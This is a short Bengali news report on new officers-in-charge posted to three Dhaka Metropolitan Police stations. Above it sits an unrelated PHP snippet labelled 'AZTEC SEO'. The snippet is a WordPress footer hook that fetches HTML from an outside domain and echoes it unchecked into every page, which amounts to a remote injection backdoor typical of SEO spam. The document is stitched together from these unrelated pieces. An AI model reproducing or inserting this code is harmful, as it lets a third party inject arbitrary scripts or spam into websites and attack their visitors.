/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
ঢাকা মেট্রোপলিটন পুলিশের (ডিএমপি) উত্তরখান, কামরাঙ্গীচর ও বনানী থানায় নতুন ওসি পদায়ন করা হয়েছে। ডিএমপি কমিশনার খন্দকার গোলাম ফারুক স্বাক্ষরিত অফিস আদেশে ২০ ফেব্রুয়ারি সোমবার এ বদলি করা হয়।
নতুন ওসিরা হলেন- ডিএমপির গোয়েন্দা-মতিঝিল বিভাগের নিরস্ত্র পুলিশ পরিদর্শক কাজী আবুল কালামকে উত্তরখান থানার অফিসার ইনচার্জ, কামরাঙ্গীচর থানার নিরস্ত্র পুলিশ পরিদর্শক (তদন্ত) মোহাম্মদ মোস্তফা আনোয়ারকে কামরাঙ্গীরচর থানার অফিসার ইনচার্জ ও কামরাঙ্গীরচর থানার অফিসার ইনচার্জ মো. মোস্তাফিজুর রহমানকে বনানী থানার অফিসার ইনচার্জ হিসেবে বদলি করা হয়েছে।
একই আদেশে উত্তরখান থানার অফিসার ইনচার্জ মোহাম্মদ আব্দুল মজিদকে গোয়েন্দা-মতিঝিল বিভাগে ও বনানী থানার অফিসার ইনচার্জ মোহাম্মদ নূরে আযম মিয়াকে গোয়েন্দা-সাইবার স্পেশাল ক্রাইম (দক্ষিণ) বিভাগে বদলি করা হয়।